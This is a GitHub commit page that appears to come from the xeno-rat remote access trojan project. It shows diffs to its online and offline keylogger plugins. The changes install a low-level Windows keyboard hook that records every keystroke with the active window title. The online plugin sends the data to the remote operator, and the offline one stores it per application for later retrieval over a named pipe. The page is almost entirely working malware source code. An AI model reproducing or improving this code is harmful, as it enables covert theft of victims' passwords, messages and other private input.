Skip to content

Commit

Permalink
added flags, domain name and idle time to the client view. imrpoved k…
Browse files Browse the repository at this point in the history 
…eylogger, improved networking speeds by compression then encrypting, fixed some bugs. re-did the reverse proxy, works better now
  • Loading branch information
moom825 committed Feb 9, 2024
1 parent 67b7a67 commit e823386
Show file tree
Hide file tree
Showing 277 changed files with 2,218 additions and 410 deletions.
89 changes: 61 additions & 28 deletions Plugins/KeyLogger/keyLogger.cs
View file
@@ -1,8 +1,10 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
using System.Windows.Forms;
using xeno_rat_client;
Expand All @@ -12,48 +14,76 @@ namespace Plugin
{
public class Main
{
public delegate IntPtr HookCallbackDelegate(int nCode, IntPtr wParam, IntPtr lParam);

[DllImport("user32.dll")]
public static extern IntPtr SetWindowsHookEx(int idHook, HookCallbackDelegate lpfn, IntPtr wParam, uint lParam);

[DllImport("user32.dll")]
public static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("user32.dll")]
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

private static int WH_KEYBOARD_LL = 13;
private static int WM_KEYDOWN = 0x100;

Node node;


public async Task Run(Node node)
{
await node.SendAsync(new byte[] { 3 });//indicate that it has connected

this.node = node;
IntPtr hookHandle=IntPtr.Zero;
new Thread(() =>
{
HookCallbackDelegate hcDelegate = HookCallback;
Process currproc = Process.GetCurrentProcess();
string mainModuleName = currproc.MainModule.ModuleName;
currproc.Dispose();
hookHandle = SetWindowsHookEx(WH_KEYBOARD_LL, hcDelegate, GetModuleHandle(mainModuleName), 0);
Application.Run();
}).Start();
while (node.Connected())
{
string retchar = await GetKey();
if (retchar != null)
{
string open_application = xeno_rat_client.Utils.GetCaptionOfActiveWindow().Replace("*", "");
await node.SendAsync(Encoding.UTF8.GetBytes(open_application));
await node.SendAsync(Encoding.UTF8.GetBytes(retchar));
}

Application.DoEvents();
await Task.Delay(1);
}
if (hookHandle != IntPtr.Zero)
{
UnhookWindowsHookEx(hookHandle);
}

}

private async Task<string> GetKey()
public async Task sendKeyData(string charectar)
{
return await Task.Run(() =>
string open_application = xeno_rat_client.Utils.GetCaptionOfActiveWindow().Replace("*", "");
if (node == null || !node.Connected()) return;
await node.SendAsync(Encoding.UTF8.GetBytes(open_application));
await node.SendAsync(Encoding.UTF8.GetBytes(charectar));
}

public IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
for (int i = 0; i < 255; i++)
int vkCode = Marshal.ReadInt32(lParam);
bool isShiftPressed = (GetAsyncKeyState((int)Keys.ShiftKey) & 0x8000) != 0;
string character = GetCharacterFromKey((uint)vkCode, isShiftPressed);
if ((((ushort)GetKeyState(0x14)) & 0xffff) != 0)//check for caps lock
{
short state = GetAsyncKeyState(i);
if ((state & 0x8000) != 0 && !keyStates[i])
{
keyStates[i] = true;
bool isShiftPressed = (GetAsyncKeyState((int)Keys.ShiftKey) & 0x8000) != 0;
string character = GetCharacterFromKey((uint)i, isShiftPressed);
return character;
}
else if ((state & 0x8000) == 0 && keyStates[i])
{
keyStates[i] = false;
}
character= character.ToUpper();
}
return null;
});
sendKeyData(character);
}
return CallNextHookEx(IntPtr.Zero, nCode, wParam, lParam);
}


private static Dictionary<uint, string> nonVisibleCharacters = new Dictionary<uint, string>()
{
{ 0x08, "[backspace]" },
Expand Down Expand Up @@ -185,10 +215,13 @@ private static string GetCharacterFromKey(uint virtualKeyCode, bool isShiftPress
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);

[DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
public static extern short GetKeyState(int keyCode);

[DllImport("user32.dll")]
private static extern int ToUnicode(uint virtualKeyCode, uint scanCode, byte[] keyboardState,
[Out, MarshalAs(UnmanagedType.LPWStr, SizeConst = 64)] StringBuilder receivingBuffer,
int bufferSize, uint flags);

}
}
79 changes: 74 additions & 5 deletions Plugins/KeyLoggerOffline/KeyLoggerOffline.cs
View file
@@ -1,5 +1,6 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Linq;
Expand All @@ -18,6 +19,7 @@ public class Main
bool started = false;
bool owner = true;
bool FULLSTOP = false;
IntPtr key_hook= IntPtr.Zero;
CancellationTokenSource FULLSTOP_token = new CancellationTokenSource();
Dictionary<string, string> applicationkeylogs;
string pipename = "OfflineKeyloggerPipe";
Expand Down Expand Up @@ -52,6 +54,7 @@ public class Main
try
{
byte[] data = await node.ReceiveAsync();
Console.WriteLine(data[0]);
if (data == null)
{
break;
Expand All @@ -67,7 +70,8 @@ public class Main
}
else if (data[0] == 1)
{
await Start();
Console.WriteLine("start");
Start();
}
else if (data[0] == 2)
{
Expand Down Expand Up @@ -97,7 +101,8 @@ public class Main
{
while (!FULLSTOP)
{
await Task.Delay(5000);
Application.DoEvents();
await Task.Delay(1);
}
}

Expand All @@ -112,7 +117,7 @@ public async Task StartServer()
{

applicationkeylogs = new Dictionary<string, string>();
keylogloop();
//keylogloop();
while (!FULLSTOP)
{
NamedPipeServerStream server = new NamedPipeServerStream(pipename, PipeDirection.InOut, 254, PipeTransmissionMode.Byte, PipeOptions.Asynchronous);
Expand Down Expand Up @@ -204,14 +209,42 @@ public async Task DO_FULLSTOP()
FULLSTOP = true;
FULLSTOP_token.Cancel();
FULLSTOP_token.Dispose();
if (key_hook != IntPtr.Zero)
{
UnhookWindowsHookEx(key_hook);
key_hook = IntPtr.Zero;
}
return;
}
try
{
await client.WriteAsync(new byte[] { 5 }, 0, 1);
}
catch { }
}

public IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (started && nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
bool isShiftPressed = (GetAsyncKeyState((int)Keys.ShiftKey) & 0x8000) != 0;
string character = GetCharacterFromKey((uint)vkCode, isShiftPressed);
string open_application = Utils.GetCaptionOfActiveWindow().Replace("*", "");
if ((((ushort)GetKeyState(0x14)) & 0xffff) != 0)//check for caps lock
{
character = character.ToUpper();
}
if (!applicationkeylogs.ContainsKey(open_application))
{
applicationkeylogs.Add(open_application, "");
}
Console.WriteLine(character);
applicationkeylogs[open_application] += character;
}
return CallNextHookEx(IntPtr.Zero, nCode, wParam, lParam);
}


public async Task keylogloop()
{
Expand All @@ -224,7 +257,7 @@ public async Task keylogloop()
string retchar = await GetKey();
if (retchar != null)
{
string open_application = xeno_rat_client.Utils.GetCaptionOfActiveWindow().Replace("*","");
string open_application = Utils.GetCaptionOfActiveWindow().Replace("*","");
if (!applicationkeylogs.ContainsKey(open_application))
{
applicationkeylogs.Add(open_application, "");
Expand Down Expand Up @@ -272,6 +305,7 @@ private static byte[] ConvertDictionaryToBytes(Dictionary<string, string> dictio
dictionary[currentKey] = currentValue.ToString(); // Use ToString to get the string
currentKey = null;
currentValue.Clear();

}
}
else
Expand Down Expand Up @@ -344,9 +378,18 @@ private static byte[] ConvertDictionaryToBytes(Dictionary<string, string> dictio
}
public async Task Start()
{
if (owner)
if (owner && !started)
{
started = true;
new Thread(() =>
{
HookCallbackDelegate hcDelegate = HookCallback;
Process currproc = Process.GetCurrentProcess();
string mainModuleName = currproc.MainModule.ModuleName;
currproc.Dispose();
key_hook = SetWindowsHookEx(WH_KEYBOARD_LL, hcDelegate, GetModuleHandle(mainModuleName), 0);
Application.Run();//this is blocking, fix it
}).Start();
return;
}
await client.WriteAsync(new byte[] { 2 }, 0, 1);
Expand All @@ -356,6 +399,13 @@ public async Task Stop()
if (owner)
{
started = false;

if (key_hook != IntPtr.Zero)
{
UnhookWindowsHookEx(key_hook);
key_hook= IntPtr.Zero;
}

return;
}
await client.WriteAsync(new byte[] { 3 }, 0, 1);
Expand Down Expand Up @@ -541,6 +591,25 @@ private static string GetCharacterFromKey(uint virtualKeyCode, bool isShiftPress
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);

[DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
public static extern short GetKeyState(int keyCode);

public delegate IntPtr HookCallbackDelegate(int nCode, IntPtr wParam, IntPtr lParam);

[DllImport("user32.dll")]
public static extern IntPtr SetWindowsHookEx(int idHook, HookCallbackDelegate lpfn, IntPtr wParam, uint lParam);

[DllImport("user32.dll")]
public static extern bool UnhookWindowsHookEx(IntPtr hhk);

[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("user32.dll")]
public static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

private static int WH_KEYBOARD_LL = 13;
private static int WM_KEYDOWN = 0x100;


[DllImport("user32.dll")]
private static extern int ToUnicode(uint virtualKeyCode, uint scanCode, byte[] keyboardState,
Expand Down

0 comments on commit e823386

Please sign in to comment.